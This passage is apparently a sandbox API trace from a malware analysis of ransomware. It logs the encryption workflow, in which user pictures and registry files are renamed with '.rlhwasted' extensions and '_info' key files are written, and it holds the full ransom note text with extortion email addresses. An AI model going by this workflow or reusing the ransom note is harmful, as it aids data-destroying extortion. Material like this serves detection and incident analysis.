lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.586] SetEndOfFile (hFile=0x124) returned 1 [0195.587] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.587] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.587] lstrcpyW (in: lpString1=0x6d551c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.rlhwasted")) returned 0 [0195.587] GetLastError () returned 0x20 [0195.587] CloseHandle (hObject=0x124) returned 1 [0195.588] lstrcpyW (in: lpString1=0x6d551c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.588] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.rlhwasted_info")) returned 1 [0195.589] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.589] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.590] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.590] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\585C.bmp") returned 51 [0195.591] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x270) returned 0x6d4580 [0195.591] lstrcpyW (in: lpString1=0x6d45e6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.591] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.591] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.592] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.592] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\585C.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\585c.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.592] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.594] SetEndOfFile (hFile=0x124) returned 1 [0195.594] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.594] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.594] lstrcpyW (in: lpString1=0x6d45e6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\585C.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\585c.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\585C.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\585c.bmp.rlhwasted")) returned 1 [0195.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\585C.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\585c.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.595] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0195.599] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0195.600] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e8c70 | out: pbBuffer=0x6e8c70) returned 1 [0195.600] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.601] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0195.601] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.601] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.611] SetEndOfFile (hFile=0x124) returned 1 [0195.614] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.614] CloseHandle (hObject=0x124) returned 1 [0195.616] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.616] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0195.617] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.617] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\76CTkcIBaeB.jpg") returned 58 [0195.617] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x6d4580 [0195.618] lstrcpyW (in: lpString1=0x6d45f4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.618] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.618] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0195.619] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.619] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\76CTkcIBaeB.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\76ctkcibaeb.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.619] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.621] SetEndOfFile (hFile=0x124) returned 1 [0195.621] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.621] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.621] lstrcpyW (in: lpString1=0x6d45f4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\76CTkcIBaeB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\76ctkcibaeb.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\76CTkcIBaeB.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\76ctkcibaeb.jpg.rlhwasted")) returned 1 [0195.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\76CTkcIBaeB.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\76ctkcibaeb.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0195.622] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.624] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0195.625] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e8c70 | out: pbBuffer=0x6e8c70) returned 1 [0195.625] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.625] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0195.626] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.626] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.683] SetEndOfFile (hFile=0x124) returned 1 [0195.686] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.686] CloseHandle (hObject=0x124) returned 1 [0195.688] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.688] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.689] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.689] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.689] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\AVdvLh0ND2gn-IbfZ.jpg") returned 69 [0195.689] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d4580 [0195.689] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.689] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.689] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.690] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.690] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\AVdvLh0ND2gn-IbfZ.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\avdvlh0nd2gn-ibfz.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.691] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.692] SetEndOfFile (hFile=0x124) returned 1 [0195.692] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.693] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.693] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\AVdvLh0ND2gn-IbfZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\avdvlh0nd2gn-ibfz.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\AVdvLh0ND2gn-IbfZ.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\avdvlh0nd2gn-ibfz.jpg.rlhwasted")) returned 1 [0195.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\AVdvLh0ND2gn-IbfZ.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\avdvlh0nd2gn-ibfz.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.694] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.695] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0195.696] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e8c60 | out: pbBuffer=0x6e8c60) returned 1 [0195.696] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.696] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0195.697] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.697] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.713] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0195.714] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8c18 | out: hHeap=0x6b0000) returned 1 [0195.714] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.714] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]DBtLj3vLY5TAs+dPqWk9VBJE3VHVNdZtUIVVBH1AeedWL1FeshwuFI5UMHP957Bq\r\nyvZzT8Eh6qHD22PmOq8K4PyPT6x4nswb/QvaKDOwSp8VXiuIz1yS2BtnvvaMLJBF\r\naL4bTsBVcOcQP8znU8e6Tq9BCeox66+QvUfU6TKwxyaa2I4F71K6OYha9hPKck2S\r\n9pN12//xs8IXl69BblcS8go3+joNMdkjaI7VXauvuWYc+mVwkhpJ0nrNTCZHaQJz\r\n8OYf782RmhIz33W+NeSy9tQ0f0YCqV6ve2aIugFjtpiFv29mBNloqOSxVvJGg8LL\r\nCciK+eE/EWgQM3Gl2Hsxm9ddNK+yHA3qh+hWlWGIR6TEqbMzlUNu79a6car6Zj+m\r\nRjJztp8iu1WPONJr2kY5gpi9vXAd3I3z9sS/Gu6vr+9EPVoNYKNnUSRExlM9AfKM\r\n3m+ajq6J52XbMhdyCJXGc/yzPb91WoQQ8F/wt8YtySGSjuqHRBylR1Jyd1WoRcQJ\r\nfOkVt4BEgrAuW3gJY54R2ncGMrxJ/BCXqd8PXfuu7pzftzraJ8gRPTYxscZkzJG9\r\nT3C5UohqpLW53hp/wdUHrlhiPYSmRfTXQN7APLDYSL6oyiCZlu7s7u5xM+L94GXO\r\n3QbCFJxxzavlcOGUF0a5vaE64d59Qtwe9X98jBHng0r=[end_key]\r\nKEEP IT\r\n") returned 981 [0195.774] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.774] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0195.774] SetEndOfFile (hFile=0x124) returned 1 [0195.777] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.777] CloseHandle (hObject=0x124) returned 1 [0195.779] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.779] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edc80 | out: hHeap=0x6b0000) returned 1 [0195.779] _aulldvrm () returned 0x0 [0195.779] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.780] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.780] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\tLjtoSOvW7Xmp8I.png") returned 67 [0195.780] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x290) returned 0x6d4580 [0195.780] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.780] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.781] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.781] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.781] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\tLjtoSOvW7Xmp8I.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\tljtosovw7xmp8i.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.782] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.783] SetEndOfFile (hFile=0x124) returned 1 [0195.784] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.784] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.784] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\tLjtoSOvW7Xmp8I.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\tljtosovw7xmp8i.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\tLjtoSOvW7Xmp8I.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\tljtosovw7xmp8i.png.rlhwasted")) returned 1 [0195.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\tLjtoSOvW7Xmp8I.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\tljtosovw7xmp8i.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.785] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0195.785] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x16446 [0195.786] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16446) returned 0xb00000 [0195.786] CloseHandle (hObject=0x12c) returned 1 [0195.793] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0195.794] CloseHandle (hObject=0x128) returned 1 [0195.794] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0195.794] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0195.795] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0195.796] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.796] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0195.797] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.797] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.807] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0195.807] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0195.807] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.807] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hU9kedfsFiLWwiR5h18EjYQfcFdGWBKfrXVvAQUAm01uSC1gdch1rCJZiURUWI7S\r\ncl/dwGj4zxY5HnfTZYXzzdWAX+GNm2u39Xa4n6F8TOfTeQQ9K2AoU7stuTclRiuy\r\n9lhsj3Nd2ZA3X5CGS9fjdNurF6x9tSPvhu4cQcltvgBALkT7JKcjpTeCX69iFa0t\r\nWPJfVd7W8QYqQK2IM0+mYVZg9WxwGpfeVMIKWlHQlsOvvgoEIGiHD7rAGkFRwZdU\r\nJmcWgZEAu4aStf/i7YNe0emBguP9Nrch13jPTxHGFKxn4L4t11gFu9N3Yrb7xY/H\r\nY9ZLM/UziL8/mwd1mg7jGm7f5SZ5To3cK6VUkFHMe820ggHBwJY6hgDRdHZgqHSi\r\nI1uIy6ksNV/Ab/OMv5qEaTmFzViw9wReC+iCQU6XPmcgTw4BP20JOTgNWsyKZFxk\r\neGfGdT+tdeHxRfrDj0n+S+FHjEODC15ITlJgLvYQrYJ3YZ/tuBhG7gwFdIklqITG\r\n2ErOsWX6h7pPNLdrKerT3HPnQE6K9G2rUDKYFPTQsSc6E+KAYFdK99JxYufpOZf/\r\nJNkwjszR/2ce1JkVcwv5B1voEFDR/OYK1jj1RGxzOEKeNus5SMxs6Kl5MRbBjl9W\r\nXypmmL4za/k8Ce5edG7IZRxjd6rgpDyQdKRlHuKSBY2=[end_key]\r\nKEEP IT\r\n") returned 981 [0195.807] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.807] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0195.808] SetEndOfFile (hFile=0x124) returned 1 [0195.810] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: 